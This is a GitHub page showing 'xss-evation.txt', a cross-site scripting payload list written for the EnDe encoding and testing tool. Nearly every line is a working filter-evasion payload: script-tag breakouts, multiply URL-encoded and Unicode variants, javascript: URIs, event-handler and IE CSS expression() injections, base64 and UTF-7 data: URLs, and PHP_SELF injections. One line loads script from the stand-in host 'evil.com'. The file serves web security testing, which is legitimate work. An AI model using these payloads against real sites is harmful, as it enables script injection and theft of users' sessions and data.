-
Notifications
You must be signed in to change notification settings - Fork 17
Expand file tree
/
Copy pathxss-evation.txt
More file actions
217 lines (207 loc) · 7.26 KB
/
xss-evation.txt
File metadata and controls
217 lines (207 loc) · 7.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
# =========================================================================== #
#?
#? NAME
#? xss-evation.txt
#?
#? SYNOPSIS
#?
#? DESCRIPTION
#? List of Cross-site Scriptings (XSS) samples.
#? Empty lines and lines starting with a # are comments and should be
#? ignored. All other lines contain one payload per line.
#?
# HACKER's INFO
# This file used in EnDe's "Load File" menu.
#?
#? VERSION
#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43
#?
#? AUTHOR
#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net
#?
# =========================================================================== #
#group most-in-one pattern
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
#group general filter evasion
"'><script>alert('XSS')</script>
"'><script>alert(/XSS/)</script>
"'><script>alert(42)</script>
"'><script>prompt(42)</script>
"'><script>confirm(42)</script>
"'><sCriPt>confirm(42)</sCriPt>
"'><script >confirm(42)</script >
"'><script foo=bar>confirm(42)</script>
"'><\script>confirm(42)</script>
"'><sc\ript>confirm(42)</script>
"'><sc\tript>confirm(42)</script>
"'><script onlyOpera:-)>alert(42)
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
"'><script x:href='//evil.com/onlyOpera'>
"'><///script///>alert(42)</script>
"'><///style///>alert(42)</script>
"'><;(24)trela=daolno ;''=e>'=d
"'><;(24)trela=daolno ;''=/e>'=d
"'><isindex action="javas	cript:alert(42)" type=image>
# real tab
"'><sc ript>confirm(42)</script>
# URL-encoded
"'%3e%3cscript%3econfirm(42)%3c/script%3e
"'%253e%253cscript%253econfirm(42)%253c/script%253e
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
# Unicode characters
"'><script>\u0061lert(42)</script>
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
#group javascript keywords
javascript:alert(42)
javascript:prompt(42)
javascript:confirm(42)
jAvasCript:confirm(42)
jAvas\Cript:confirm(42)
jAvas Cript:confirm(42)
jAvas/* */Cript:confirm(42)
javascript:alert(42)
document
document.
top
top.
top[
eval
eval(
cookie
.cookie
#group HTML event keywords
onerror
onerror=
onclick
onclick=
onmouseover
onmouseover=
onload
onload=
"onerror
"onerror=
"onclick
"onclick=
"onmouseover
"onmouseover=
"onload
"onload=
#group HTML tag attribute keywords
href=
src=
link=
style=
alt=
title=
egal=
"href=
"src=
"link=
"style=
"alt=
"title=
"egal=
#group HTML tag keywords
<a
<a href=
<a alt=42 href=
<a href="javascript:
<a href=" javascript:
<p
<div
<iframe
<index
<layer
<link
<meta
<style
<script
<img src="/" =_=" title="onerror='alert(42)'">
<img src ?notinChrome?\/onerror = alert(42)
<img src ?notinChrome?\/onerror=alert(42)
<img/alt="/"src="/"onerror=alert(42)>
<iframe/src \/\/onload = alert(42)
<iframe/onreadystatechange=alert(42)
<!-- open comment
<!-- complete comment -->
--><!-- close/complete comment -->
<![CDATA[
<![CDATA[ open cdata
<![CDATA[ complete cdata ]]>
]]><![CDATA[ close/complete cdata ]]>
<?xml
<?xml version="1.0">
#group general IE
" value=``
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group general IE CSS expression injection
<div style="{ left:expression( alert('XSS') ) }">
#group IE CSS expression variants
left:expr/**/ession(alert('XSS'))
left:expr/* */ession(alert('XSS'))
left:e\0078pr\0065ssion(alert('XSS'))
left:\0065\0078pr\0065ssion(alert('XSS'))
left:expr\65ssion(alert('XSS') ))
left:expr\0065ssion(alert('XSS'))
left:expression(alert('XSS'))
left:expression(alert('XSS'))
left:expression(alert('XSS'))
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
left:expression(alert('XSS'))
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
#group IE CSS expression in fullwidth (same as above)
left:expression(alert('XSS'))
#group IE CSS expression in capital letters
left:EXPR/**/ESSION(alert('XSS'))
left:EXPR/* */ESSION(alert('XSS'))
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
left:EXPRbsSION(alert('XSS'))
left:EXPRESSION(alert('XSS'))
#group IE CSS expression with foreign Unicode letters
left:exp\0280essio\0274(alert('XSS'))
left:exp\0280essio\207f(alert('XSS'))
left:expʀessioɴ(alert('XSS'))
left:expʀessioⁿ(alert('XSS'))
# see http://openmya.hacker.jp/hasegawa/security/expression.txt also
#group Unicode Left/Right Pointing Double Angel Quotation Mark
# improved pattern from: http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html
%u00ABscript%u00BB
〈script〉
U%2bFF1CscriptU%2bFF1E
‹script›
〈script〉
⟨script⟩
#group data: URL
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
#group PHP
# use of $_SERVER['PHP_SELF']
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
<%<!--'%><script>alert(42);</script -->